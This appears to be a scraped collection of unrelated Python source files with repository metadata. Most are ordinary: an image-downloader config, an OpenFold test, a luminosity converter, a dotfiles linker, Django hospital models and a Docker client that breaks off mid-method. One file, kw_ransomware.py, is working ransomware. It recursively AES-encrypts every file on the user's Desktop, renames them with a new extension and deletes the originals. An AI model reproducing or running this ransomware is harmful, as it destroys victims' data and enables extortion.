cfg['DOWNLOADS']['default_download_dir'] = 'download'
with open(file_name, 'w') as cfg_file:
cfg.write(cfg_file)
print("New configuration file generated!\n")
print("Please edit 'settings.ini' and input your authentication information before continuing to use this script.\n")
# open an already existing config file (assumes correct items)
def read_config_file(file_name):
cfg = ConfigParser()
cfg.read(file_name)
return cfg
if __name__ == "__main__":
settings = 'settings.ini'
config = None
if isfile(settings):
config = read_config_file(settings)
else:
create_config_file(settings)
input("Press any key to exit.")
exit()
with Client(config) as client:
client.download_images()
| 39.272553 | 129 | 0.589903 | 2,490 | 20,461 | 4.673494 | 0.198795 | 0.030076 | 0.037295 | 0.010312 | 0.197817 | 0.137492 | 0.114978 | 0.073215 | 0.059466 | 0.044169 | 0 | 0.006702 | 0.299936 | 20,461 | 520 | 130 | 39.348077 | 0.805711 | 0.142417 | 0 | 0.116531 | 0 | 0.00813 | 0.143892 | 0.021854 | 0 | 0 | 0 | 0.001923 | 0 | 1 | 0.084011 | false | 0.01626 | 0.04336 | 0.01626 | 0.208672 | 0.00813 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4137ed760291cec3e1fabbc437a8f67ebd69c0e3 | 1,598 | py | Python | tests/test_primitives.py | empyriumz/openfold | 12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32 | [
"Apache-2.0"
] | 789 | 2021-11-12T16:12:21.000Z | 2022-03-28T05:45:19.000Z | tests/test_primitives.py | empyriumz/openfold | 12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32 | [
"Apache-2.0"
] | 84 | 2021-11-12T22:23:50.000Z | 2022-03-29T01:06:06.000Z | tests/test_primitives.py | empyriumz/openfold | 12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32 | [
"Apache-2.0"
] | 114 | 2021-11-12T16:00:57.000Z | 2022-03-27T21:32:31.000Z | # Copyright 2021 AlQuraishi Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import unittest
from openfold.model.primitives import (
Attention,
)
from tests.config import consts
class TestLMA(unittest.TestCase):
def test_lma_vs_attention(self):
batch_size = consts.batch_size
c_hidden = 32
n = 2**12
no_heads = 4
q = torch.rand(batch_size, n, c_hidden).cuda()
kv = torch.rand(batch_size, n, c_hidden).cuda()
bias = [torch.rand(no_heads, 1, n)]
bias = [b.cuda() for b in bias]
gating_fill = torch.rand(c_hidden * no_heads, c_hidden)
o_fill = torch.rand(c_hidden, c_hidden * no_heads)
a = Attention(
c_hidden, c_hidden, c_hidden, c_hidden, no_heads
).cuda()
with torch.no_grad():
l = a(q, kv, biases=bias, use_lma=True)
real = a(q, kv, biases=bias)
self.assertTrue(torch.max(torch.abs(l - real)) < consts.eps)
if __name__ == "__main__":
unittest.main()
| 29.592593 | 74 | 0.652691 | 232 | 1,598 | 4.344828 | 0.5 | 0.076389 | 0.031746 | 0.055556 | 0.175595 | 0.115079 | 0.059524 | 0.059524 | 0 | 0 | 0 | 0.012584 | 0.254068 | 1,598 | 53 | 75 | 30.150943 | 0.833054 | 0.349812 | 0 | 0 | 0 | 0 | 0.007805 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.035714 | false | 0 | 0.178571 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4138a7bccc894c41843ad8dd0583587c67038959 | 1,466 | py | Python | python/Lumniosity_Converter.py | pbrown801/aggienova-templates | 24f1269bf26ab8026a27df87358f80ea8ad04933 | [
"MIT"
] | 2 | 2019-09-23T18:42:12.000Z | 2019-09-30T04:17:10.000Z | python/Lumniosity_Converter.py | pbrown801/aggienova-templates | 24f1269bf26ab8026a27df87358f80ea8ad04933 | [
"MIT"
] | 12 | 2019-02-20T18:38:25.000Z | 2022-03-13T02:32:57.000Z | python/Lumniosity_Converter.py | pbrown801/aggienova-templates | 24f1269bf26ab8026a27df87358f80ea8ad04933 | [
"MIT"
] | 1 | 2020-01-14T17:26:33.000Z | 2020-01-14T17:26:33.000Z | import pandas as pd
import numpy as np
import math
from dust_extinction.parameter_averages import F19
def extinction_adjustment(rv):
len_wave=len(sn_templ['Wavelength'])
wavenum_waves = [1/(a/10000) for a in sn_templ['Wavelength']]
ext_model = F19(Rv=rv)
return(pd.Series(ext_model(wavenum_waves)))
def Dm_to_Lum(sn_name):
def Grab_Lum(Dist_mod, Flux):
P_cm= 3.08567758128*10**(18)
D_cm= 10**((Dist_mod/5)+1)*P_cm
S_a= 4*np.pi*D_cm**2
lum= Flux*S_a
return lum
idex= swift.loc[swift.isin([sn_name]).any(axis=1)].index.tolist()
idex=idex[0]
Dist_mod= swift['Dist_mod_cor'][idex]
Lum= pd.Series(sn_templ.apply(lambda row: Grab_Lum(Dist_mod=Dist_mod, Flux= row['Flux']), axis=1))
Lum=Lum/extinction_adjustment(3.1)
Lum=pd.DataFrame({'MJD': sn_templ['MJD'], 'Wavelength': sn_templ['Wavelength'], 'Luminosity': Lum.tolist()})
return Lum
def Lum_conv(sn_name,output_file):
global swift
swift= pd.read_csv('../input/NewSwiftSNweblist.csv')
global sn_templ
'''Input desired template file name with Flux'''
sn_templ= pd.read_csv(output_file)
sn_name= sn_name.replace("_uvot","")
'''Input name of supernovae'''
lum_templ= Dm_to_Lum(sn_name)
return lum_templ
if __name__ == "__main__":
l=Lum_conv('SN2005cs_uvot','../output/TEMPLATE/SN2005cs_uvot_SNIa_series_template.csv')
# print(type(l))
# extinction_adjustment(3.1) | 28.745098 | 112 | 0.677353 | 230 | 1,466 | 4.03913 | 0.391304 | 0.052745 | 0.054898 | 0.019376 | 0.027987 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038907 | 0.175989 | 1,466 | 51 | 113 | 28.745098 | 0.730132 | 0.027967 | 0 | 0 | 0 | 0 | 0.137546 | 0.064684 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.121212 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413b8b891d2f44221bdddfd4cafbe2d545ac748d | 4,076 | py | Python | bin/dotty.py | jgrip/dotfiles | 78e96c3eaa1bb64d9197b23115bb1f144d4ca184 | [
"Unlicense"
] | null | null | null | bin/dotty.py | jgrip/dotfiles | 78e96c3eaa1bb64d9197b23115bb1f144d4ca184 | [
"Unlicense"
] | null | null | null | bin/dotty.py | jgrip/dotfiles | 78e96c3eaa1bb64d9197b23115bb1f144d4ca184 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
from __future__ import print_function
# Copyright (C) 2015 Vibhav Pant <vibhavp@gmail.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import json
import os
import shutil
from sys import stderr
import argparse
# Fix Python 2.x.
try: input = raw_input
except NameError: pass
def ask_user(prompt):
valid = {"yes":True, 'y':True, '':True, "no":False, 'n':False}
while True:
print("{0} ".format(prompt),end="")
choice = input().lower()
if choice in valid:
return valid[choice]
else:
print("Enter a correct choice.", file=stderr)
def create_directory(path):
exp = os.path.expanduser(path)
if (not os.path.isdir(exp)):
print("{0} doesnt exist, creating.".format(exp))
os.makedirs(exp)
def create_symlink(src, dest, replace):
dest = os.path.expanduser(dest)
src = os.path.abspath(src)
broken_symlink = os.path.lexists(dest) and not os.path.exists(dest)
if os.path.lexists(dest):
if os.path.islink(dest) and os.readlink(dest) == src:
print("Skipping existing {0} -> {1}".format(dest, src))
return
elif replace or ask_user("{0} exists, delete it? [Y/n]".format(dest)):
if os.path.isfile(dest) or broken_symlink or os.path.islink(dest):
os.remove(dest)
else:
shutil.rmtree(dest)
else:
return
print("Linking {0} -> {1}".format(dest, src))
try:
os.symlink(src, dest)
except AttributeError:
import ctypes
symlink = ctypes.windll.kernel32.CreateSymbolicLinkW
symlink.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
symlink.restype = ctypes.c_ubyte
flags = 1 if os.path.isdir(src) else 0
symlink(dest, src, flags)
def copy_path(src, dest):
dest = os.path.expanduser(dest)
src = os.path.abspath(src)
if os.path.exists(dest):
if ask_user("{0} exists, delete it? [Y/n]".format(dest)):
if os.path.isfile(dest) or os.path.islink(dest):
os.remove(dest)
else:
shutil.rmtree(dest)
else:
return
print("Copying {0} -> {1}".format(src, dest))
if os.path.isfile(src):
shutil.copy(src, dest)
else:
shutil.copytree(src, dest)
def run_command(command):
print("Running {0}".format(command))
os.system(command)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("config", help="the JSON file you want to use")
parser.add_argument("-r", "--replace", action="store_true",
help="replace files/folders if they already exist")
args = parser.parse_args()
js = json.load(open(args.config))
os.chdir(os.path.expanduser(os.path.abspath(os.path.dirname(args.config))))
if 'directories' in js: [create_directory(path) for path in js['directories']]
if 'link' in js: [create_symlink(src, dst, args.replace) for src, dst in js['link'].items()]
if 'copy' in js: [copy_path(src, dst) for src, dst in js['copy'].items()]
if 'install' in js and 'install_cmd' in js:
packages = ' '.join(js['install'])
run_command("{0} {1}".format(js['install_cmd'], packages))
if 'commands' in js: [run_command(command) for command in js['commands']]
print("Done!")
if __name__ == "__main__":
main()
| 34.837607 | 96 | 0.639352 | 581 | 4,076 | 4.416523 | 0.359725 | 0.046765 | 0.021824 | 0.023383 | 0.213172 | 0.160171 | 0.125487 | 0.125487 | 0.125487 | 0.125487 | 0 | 0.011832 | 0.232826 | 4,076 | 116 | 97 | 35.137931 | 0.808762 | 0.187929 | 0 | 0.202381 | 0 | 0 | 0.121966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.011905 | 0.083333 | 0 | 0.202381 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413c30019b7152204c51cd4030495eeb971c8934 | 2,472 | py | Python | sltxpkg/config.py | EagleoutIce/sltx-inst | cb45346177c22fd5bf47f29cebf34f09f16b9a4b | [
"MIT"
] | null | null | null | sltxpkg/config.py | EagleoutIce/sltx-inst | cb45346177c22fd5bf47f29cebf34f09f16b9a4b | [
"MIT"
] | null | null | null | sltxpkg/config.py | EagleoutIce/sltx-inst | cb45346177c22fd5bf47f29cebf34f09f16b9a4b | [
"MIT"
] | null | null | null | import os
import sys
from pathlib import Path
from sltxpkg import globals as sg
from sltxpkg import util as su
from sltxpkg.globals import (C_CACHE_DIR, C_CREATE_DIRS, C_DOWNLOAD_DIR, C_DRIVER_LOG,
C_TEX_HOME, C_WORKING_DIR)
from sltxpkg.log_control import LOGGER
from sltxpkg.types import SltxDependencies
def write_to_log(data: str):
if sg.configuration[C_DRIVER_LOG].strip():
with open(sg.configuration[C_DRIVER_LOG], 'a') as f:
f.write(data)
if not data.endswith('\n'):
f.write("\n")
def load_configuration(file: str):
"""Apply given configuration file to the sltx config
Args:
file (str): The configuration file to load
"""
y_conf = su.load_yaml(file)
sg.configuration = {**sg.configuration, **y_conf}
def expand_url(path: str, cwd: Path) -> str:
return "" if path is None else path.format(cwd=str(cwd.parent))
def load_dependencies_config(file: str, target: dict) -> SltxDependencies:
"""Apply given dependency file to the sltx dep list
Args:
file (str): The file to load
target (dict): The target dependency-collection to append it to (won't be modified)
Returns:
dict: The target dict with the added dependencies
"""
y_dep = su.load_yaml(file)
if 'dependencies' in y_dep:
for dep in y_dep['dependencies']:
dep_data = y_dep['dependencies'][dep]
if 'url' in dep_data:
dep_data['url'] = expand_url(
dep_data['url'], Path(file).absolute())
return {**target, **y_dep}
def assure_dir(name: str, target_path: str, create: bool):
if not os.path.isdir(target_path):
if create:
LOGGER.info("> %s: %s not found. Creating...", name, target_path)
os.makedirs(target_path)
else:
LOGGER.error("! Not allowed to create " + name + ". Exit")
sys.exit(1)
def assure_dirs():
sg.configuration[C_TEX_HOME] = su.get_sltx_tex_home() # expansion
create = sg.configuration[C_CREATE_DIRS]
assure_dir('Tex-Home', sg.configuration[C_TEX_HOME], create)
for config, name in [(C_WORKING_DIR, 'Working-Dir'), (C_DOWNLOAD_DIR, 'Download-Dir'),
(C_CACHE_DIR, 'Cache-Dir')]:
sg.configuration[config] = os.path.expanduser(
sg.configuration[config]) # expansion
assure_dir(name, sg.configuration[config], create)
| 32.96 | 91 | 0.636327 | 342 | 2,472 | 4.423977 | 0.280702 | 0.099141 | 0.052875 | 0.029081 | 0.06345 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00054 | 0.250809 | 2,472 | 74 | 92 | 33.405405 | 0.816415 | 0.147654 | 0 | 0 | 0 | 0 | 0.073408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.173913 | 0.021739 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413c68cef2a9cdf443fb29e050740dc6fceb6953 | 2,896 | py | Python | kw_ransomware.py | CodmingOut/SecretProjectAI | addc43117eab30a25453c18fa042739c33cc6cfb | [
"MIT"
] | null | null | null | kw_ransomware.py | CodmingOut/SecretProjectAI | addc43117eab30a25453c18fa042739c33cc6cfb | [
"MIT"
] | null | null | null | kw_ransomware.py | CodmingOut/SecretProjectAI | addc43117eab30a25453c18fa042739c33cc6cfb | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 21:32:11 2020
@author: kw
"""
import glob
import os, random, struct
import getpass
from Cryptodome.Cipher import AES
class makeMyRansomware:
def __init__(self, your_extension=".Example", key=b'keyfor16bytes123', username=getpass.getuser()):
self.your_extension = your_extension
self.key = key
self.username = username
def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024):
if not out_filename:
out_filename = in_filename + self.your_extension
iv = os.urandom(16)
encryptor = AES.new(key ,AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024):
if not out_filename:
out_filename = os.path.splitext(in_filename)[0]
with open(in_filename, 'rb') as infile:
origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(out_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
def Encryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
print('Encrypting> ' + filename)
self.encrypt_file(self.key, filename)
os.remove(filename)
def Decryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
fname, ext = os.path.splitext(filename)
if (ext == self.your_extension):
print('Decrypting> ' + filename)
self.decrypt_file(self.key, filename)
os.remove(filename)
if __name__ == "__main__":
import time
Ransom1 = makeMyRansomware(".Hello")
startpath = 'c:/Users/'+Ransom1.username+'/Desktop/**'
#You can encrypt or decrypt like this
Ransom1.Encryptor(startpath)
Ransom1.Decryptor(startpath) | 33.287356 | 103 | 0.564917 | 324 | 2,896 | 4.932099 | 0.342593 | 0.055069 | 0.042553 | 0.022528 | 0.397998 | 0.397998 | 0.397998 | 0.216521 | 0.216521 | 0.1602 | 0 | 0.02551 | 0.323204 | 2,896 | 87 | 104 | 33.287356 | 0.789796 | 0.044199 | 0 | 0.333333 | 0 | 0 | 0.034795 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.033333 | 0.083333 | 0 | 0.183333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413c7bf5865a56e3f581e75a1fa2f6a01c3109a4 | 4,756 | py | Python | hospital/models.py | mohitkyadav/calldoc | ebdcdcfac346e995c44cbf94a3c87c25ba594ee1 | [
"MIT"
] | 9 | 2019-05-19T14:00:03.000Z | 2019-05-21T14:19:56.000Z | hospital/models.py | mohitkyadav/calldoc | ebdcdcfac346e995c44cbf94a3c87c25ba594ee1 | [
"MIT"
] | 8 | 2019-05-20T12:29:08.000Z | 2022-02-10T11:06:55.000Z | hospital/models.py | mohitkyadav/calldoc | ebdcdcfac346e995c44cbf94a3c87c25ba594ee1 | [
"MIT"
] | 1 | 2019-05-20T07:04:20.000Z | 2019-05-20T07:04:20.000Z | import uuid
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from landing.models import Profile
class Specialisation(models.Model):
class Meta:
ordering = ('id',)
verbose_name = 'specialisation'
verbose_name_plural = 'specialisations'
id = models.CharField(unique=True, default=uuid.uuid4,
editable=False, max_length=50, primary_key=True)
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Hospital(models.Model):
class Meta:
ordering = ('-rating',)
verbose_name = 'Hospital'
verbose_name_plural = 'Hospitals'
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=1000, null=True, blank=True)
address = models.TextField(max_length=5000, null=True, blank=True)
slug = models.SlugField(unique=True, null=True, blank=True)
rating = models.PositiveSmallIntegerField(default=3, validators=[
MaxValueValidator(5),
MinValueValidator(1),
])
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$',
message="Phone number must be entered in the format:"
" '+919999999999'.")
email = models.EmailField(blank=True, help_text="Please enter valid email address, it will be used for "
"verification.")
phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True, help_text="Please enter "
"valid phone "
"number.")
specialisation = models.ManyToManyField(Specialisation, related_name='speciality_of_hospital')
verified = models.BooleanField(default=False)
def __str__(self):
return self.user.first_name
def get_url(self):
return reverse('hospital:overview', args=[self.slug])
def get_all_spec(self):
specs = ""
for spec in self.specialisation.all():
specs += spec.name + ", "
return specs[:-2]
class Doctor(models.Model):
class Meta:
ordering = ('name',)
verbose_name = 'Doctor'
verbose_name_plural = 'Doctors'
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=1000, null=True, blank=True)
address = models.TextField(max_length=5000, null=True, blank=True)
slug = models.SlugField(unique=True, null=True, blank=True)
rating = models.PositiveSmallIntegerField(default=3, validators=[
MaxValueValidator(5),
MinValueValidator(1),
])
hospital = models.ForeignKey(Hospital, related_name='doctor', on_delete=models.CASCADE)
specialisation = models.ManyToManyField(Specialisation, related_name='speciality')
def __str__(self):
return self.name
def get_url(self):
return reverse('hospital:doctor-home', args=[self.slug])
def get_all_spec(self):
specs = ""
for spec in self.specialisation.all():
specs += spec.name + ", "
return specs[:-2]
class Appointment(models.Model):
class Meta:
ordering = ('-start_date',)
verbose_name = 'Appointment'
verbose_name_plural = 'Appointments'
id = models.CharField(unique=True, default=uuid.uuid4,
editable=False, max_length=50, primary_key=True)
doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE, null=True)
patient = models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
start_date = models.DateTimeField(blank=True, null=True,
help_text="You can choose dates from now")
end_date = models.DateTimeField(blank=True, null=True,
help_text="You can choose appointment "
"duration as maximum of 7 days")
patients_remarks = models.TextField(blank=True, null=True)
doctors_remarks = models.TextField(blank=True, null=True)
approved = models.BooleanField(default=False)
rejected = models.BooleanField(default=False)
rejection_cause = models.TextField(max_length=20000, blank=True, null=True)
def __str__(self):
return str(self.doctor.name + "-" + self.patient.user.first_name)
def get_start_date(self):
return self.start_date.date()
def get_end_date(self):
return self.end_date.date()
| 39.305785 | 114 | 0.625526 | 518 | 4,756 | 5.596525 | 0.258687 | 0.035874 | 0.028976 | 0.035185 | 0.595033 | 0.5188 | 0.483615 | 0.38565 | 0.359434 | 0.359434 | 0 | 0.016157 | 0.271236 | 4,756 | 120 | 115 | 39.633333 | 0.820254 | 0 | 0 | 0.43299 | 0 | 0 | 0.093566 | 0.004626 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103093 | false | 0 | 0.061856 | 0.082474 | 0.649485 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413d8e7168ec81d7fbf240777114a40652b16b3b | 409 | py | Python | anno-search-crawler/checker.py | powerslider/anno-search | b47ae5b4077d75622e088d3064e61934a8a3cf37 | [
"Apache-2.0"
] | null | null | null | anno-search-crawler/checker.py | powerslider/anno-search | b47ae5b4077d75622e088d3064e61934a8a3cf37 | [
"Apache-2.0"
] | null | null | null | anno-search-crawler/checker.py | powerslider/anno-search | b47ae5b4077d75622e088d3064e61934a8a3cf37 | [
"Apache-2.0"
] | null | null | null | import os
import json
json_files = set()
errors = set()
dir = "extracted/json/"
for file in os.listdir(dir):
if ".json" in file:
json_files.add(file)
with open(dir + file, "r") as f:
j = json.loads("".join(f.read()))
if j["entities"] == {} or j["text"] == "":
errors.add(file)
print(errors or "All good. Scanned files: " + str(len(json_files)))
| 22.722222 | 67 | 0.545232 | 59 | 409 | 3.728814 | 0.542373 | 0.122727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.278729 | 409 | 17 | 68 | 24.058824 | 0.745763 | 0 | 0 | 0 | 0 | 0 | 0.141809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413ea01cee609cb192107f94528569476162e9b2 | 29,112 | py | Python | labpack/platforms/docker.py | collectiveacuity/labPack | c8fb0d1ee23608f6dbcb99c232373eee886000fd | [
"MIT"
] | 2 | 2017-06-20T15:20:46.000Z | 2019-11-18T01:28:49.000Z | labpack/platforms/docker.py | collectiveacuity/labPack | c8fb0d1ee23608f6dbcb99c232373eee886000fd | [
"MIT"
] | null | null | null | labpack/platforms/docker.py | collectiveacuity/labPack | c8fb0d1ee23608f6dbcb99c232373eee886000fd | [
"MIT"
] | null | null | null | __author__ = 'rcj1492'
__created__ = '2016.03'
__license__ = 'MIT'
from labpack.handlers.requests import requestsHandler
class dockerClient(requestsHandler):
_class_fields = {
'schema': {
'virtualbox_name': '',
'container_alias': '',
'image_name': '',
'image_tag': '',
'image_id': '',
'sys_command': '',
'environmental_variables': {},
'envvar_key': '',
'envvar_value': '',
'mapped_ports': {},
'port_key': '1000',
'port_value': '1000',
'mounted_volumes': {},
'mount_field': '',
'start_command': '',
'network_name': '',
'run_flags': ''
},
'components': {
'.envvar_key': {
'must_contain': [ '^[a-zA-Z_][a-zA-Z0-9_]+$' ],
'max_length': 255
},
'.envvar_value': {
'max_length': 32767
},
'.port_key': {
'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ]
},
'.port_value': {
'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ]
}
}
}
def __init__(self, virtualbox_name='', verbose=False):
'''
a method to initialize the dockerClient class
:param virtualbox_name: [optional] string with name of virtualbox image
:return: dockerClient object
'''
title = '%s.__init__' % self.__class__.__name__
# construct super
super(dockerClient, self).__init__()
# construct fields model
from jsonmodel.validators import jsonModel
self.fields = jsonModel(self._class_fields)
# validate inputs
input_fields = {
'virtualbox_name': virtualbox_name
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct properties
self.vbox = virtualbox_name
self.verbose = verbose
# construct localhost
from labpack.platforms.localhost import localhostClient
self.localhost = localhostClient()
# verbosity
if self.verbose:
print('Checking docker installation...', end='', flush=True)
# validate docker installation
self._validate_install()
if self.verbose:
print('.', end='', flush=True)
# validate virtualbox installation
self.vbox_running = self._validate_virtualbox()
if self.verbose:
print('.', end='', flush=True)
# set virtualbox variables
if self.vbox_running:
self._set_virtualbox()
if self.verbose:
print('.', end='', flush=True)
if self.verbose:
print(' done.')
def _validate_install(self):
''' a method to validate docker is installed '''
from subprocess import check_output, STDOUT
sys_command = 'docker --help'
try:
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
# call(sys_command, stdout=open(devnull, 'wb'))
except Exception as err:
raise Exception('"docker" not installed. GoTo: https://www.docker.com')
return True
def _validate_virtualbox(self):
'''
a method to validate that virtualbox is running on Win 7/8 machines
:return: boolean indicating whether virtualbox is running
'''
# validate operating system
if self.localhost.os.sysname != 'Windows':
return False
win_release = float(self.localhost.os.release)
if win_release >= 10.0:
return False
# validate docker-machine installation
from os import devnull
from subprocess import call, check_output, STDOUT
sys_command = 'docker-machine --help'
try:
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
except Exception as err:
raise Exception('Docker requires docker-machine to run on Win7/8. GoTo: https://www.docker.com')
# validate virtualbox is running
sys_command = 'docker-machine status %s' % self.vbox
try:
vbox_status = check_output(sys_command, shell=True, stderr=open(devnull, 'wb')).decode('utf-8').replace('\n', '')
except Exception as err:
if not self.vbox:
raise Exception('Docker requires VirtualBox to run on Win7/8. GoTo: https://www.virtualbox.org')
elif self.vbox == "default":
raise Exception('Virtualbox "default" not found. Container will not start without a valid virtualbox.')
else:
raise Exception('Virtualbox "%s" not found. Try using "default" instead.' % self.vbox)
if 'Stopped' in vbox_status:
raise Exception('Virtualbox "%s" is stopped. Try first running: docker-machine start %s' % (self.vbox, self.vbox))
return True
def _set_virtualbox(self):
'''
a method to set virtualbox environment variables for docker-machine
:return: True
'''
from os import environ
if not environ.get('DOCKER_CERT_PATH'):
import re
sys_command = 'docker-machine env %s' % self.vbox
cmd_output = self.command(sys_command)
variable_list = ['DOCKER_TLS_VERIFY', 'DOCKER_HOST', 'DOCKER_CERT_PATH', 'DOCKER_MACHINE_NAME']
for variable in variable_list:
env_start = '%s="' % variable
env_end = '"\\n'
env_regex = '%s.*?%s' % (env_start, env_end)
env_pattern = re.compile(env_regex)
env_statement = env_pattern.findall(cmd_output)
env_var = env_statement[0].replace(env_start, '').replace('"\n', '')
environ[variable] = env_var
return True
def _images(self, sys_output):
''' a helper method for parsing docker image output '''
import re
gap_pattern = re.compile('\t|\s{2,}')
image_list = []
output_lines = sys_output.split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
if len(columns) == len(column_headers):
image_details = {}
for j in range(len(columns)):
image_details[column_headers[j]] = columns[j]
image_list.append(image_details)
return image_list
def _ps(self, sys_output):
''' a helper method for parsing docker ps output '''
import re
gap_pattern = re.compile('\t|\s{2,}')
container_list = []
output_lines = sys_output.split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
container_details = {}
if len(columns) > 1:
for j in range(len(column_headers)):
container_details[column_headers[j]] = ''
if j <= len(columns) - 1:
container_details[column_headers[j]] = columns[j]
# stupid hack for possible empty port column
if container_details['PORTS'] and not container_details['NAMES']:
from copy import deepcopy
